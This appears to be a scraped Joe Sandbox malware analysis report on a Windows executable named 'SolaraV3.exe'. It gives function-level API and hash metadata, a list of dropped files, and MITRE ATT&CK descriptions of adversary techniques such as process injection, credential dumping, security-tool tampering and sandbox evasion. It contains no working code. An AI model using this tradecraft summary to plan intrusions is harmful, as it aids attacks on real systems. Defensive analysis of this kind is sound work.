Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction ID: 73943f8494065721c54ab436dd6451e5ca7cdc2566958a421d81237d70b472d6
Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction Fuzzy Hash: B2319022A0CAA2D9FA10FB55E4417B9A360FB447A4FC00132DE8D17B55DFBCD505C720

Function 00007FF74EEB49F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF74EEB4A7B
LoadStringW.USER32 ref: 00007FF74EEB4A94

Strings

Adding %-58s , xrefs: 00007FF74EEB4A16

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: LoadString
String ID: Adding %-58s
API String ID: 2948472770-2059140559
Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction ID: a8c4911d2fbb98934a3f2607ac79f07a763b7a05deff83b70265207252a77f70
Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction Fuzzy Hash: B4115B71B18B51C5EB10BF16E840069F7A1BB94FD0B948535CE4C83764EE7CE6028254

Function 00007FF74EE75DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EE75E1B
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EE75E2F

Strings

;%%0%du, xrefs: 00007FF74EE75E0A

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%%0%du
API String ID: 233258989-2249936285
Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction ID: 1c8b1e49037114409d2d3d78cf460358089bce6bb3f5ea5dc533fc7dbe582c0d
Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction Fuzzy Hash: EE118622A0C691D6F720FB24E4103EAB760FB84758F854131DB8D47695DF7CD949CB50

Function 00007FF74EEBB974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF74EEBB97B
GetLastError.KERNEL32 ref: 00007FF74EEBB986

Part of subcall function 00007FF74EE8CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF74EE8CEDE

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF74EEBB990

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ErrorExceptionLastObjectSingleThrowWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 564652978-2248577382
Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction ID: 9bc71864604200e21b796cacf3013e21e4e3fe874856474e70b214f9dd562799
Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction Fuzzy Hash: B4E04F21E0C822C2F644F729AC81074B390BF55774FD00370D03E825E19FACAA4AC321

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SolaraV3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RESF203.tmp

C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll

Windows Analysis Report
SolaraV3.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre